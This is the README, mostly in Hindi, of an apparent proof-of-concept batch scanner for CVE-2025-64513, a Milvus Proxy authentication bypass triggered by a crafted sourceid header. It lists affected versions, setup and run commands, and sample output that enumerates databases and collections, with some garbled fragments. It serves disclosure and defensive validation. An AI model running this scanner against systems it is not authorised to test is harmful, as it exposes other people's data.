
PoC for CVE-2025-64513 — Milvus Proxy Authentication Bypass Vulnerability Batch scanner to verify unauthorized access and gather Milvus version, health, and database info. For security research and defensive validation only.
इस रिपॉजिटरी में CVE-2025-64513 के अस्तित्व को सत्यापित करने के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) स्क्रिप्ट शामिल है, जो Milvus Proxy में एक महत्वपूर्ण प्रमाणीकरण बाईपास भेद्यता है जो आंतरिक API तक अनधिकृत पहुंच की अनुमति दे सकती है।
जब एक क्राफ्टेड sourceid हेडर के साथ एक अप्रमाणित अनुरोध भेजा जाता है, तो कुछ Milvus संस्करण पहचान जांच लागू करने में विफल रहते हैं, जिसके परिणामस्वरूप डेटाबेस मेटाडेटा और संग्रह जानकारी तक संभावित पूर्ण अप्रमाणित पहुंच हो सकती है।
⚠️ यह PoC केवल सुरक्षा अनुसंधान और रक्षात्मक सत्यापन के लिए है। इसे स्पष्ट प्राधिकरण के बिना सिस्टम पर उपयोग न करें।
वर्तमान विश्लेषण के अनुसार, निम्नलिखित Milvus संस्करण प्रभावित हैं:
| संस्करण सीमा | स्थिति |
|---|---|
< 2.4.24 | असुरक्षित |
2.5.* < 2.5.21 | असुरक्षित |
2.6.* < 2.6.5 | असुरक्षित |
बाद के संस्करणों में प्रमाणीकरण प्रवर्तन सुधार शामिल होने की उम्मीद है।
GetMetrics)git clone https://github.com/<yourname>/CVE-2025-64513-POC.git
cd CVE-2025-64513-POC
pip install -r requirements.txt
requirements.txt में शामिल होना चाहिए:
grpcio
pymilvus
एक टेक्स्ट फ़ाइल बनाएँ (जैसे targets.txt):
192.168.1.10:19530
milvus.example.com:19530
# से शुरू होने वाली पंक्तियों को अनदेखा किया जाता है।
python3 check_cve_2025_64513.py targets.txt
Starting scan for 2 targets ...
[+] 192.168.1.10:19530 is vulnerable to unauthorized access
[Version] 2.5.10
[Health] Healthy
[Database Count] 2
[Databases] ['default', 'analytics']
[Collections per Database] {'default': ['users', 'products'], 'analytics': ['events']}
[-] milvus.example.com:19530 not vulnerable (RPC failed: UNAVAILABLE)
>= 2.6.5 अनुशंसित)।19530 तक पहुंच प्रतिबंधित करें।यह परियोजना पूरी तरह से शैक्षिक और रक्षात्मक अनुसंधान उद्देश्यों के लिए है। बिना प्राधिकरण के सिस्टम पर इस PoC को चलाना गैरकानूनी है। लेखक और योगदानकर्ता इस कोड के दुरुपयोग या क्षति के लिए कोई देयता नहीं मानते।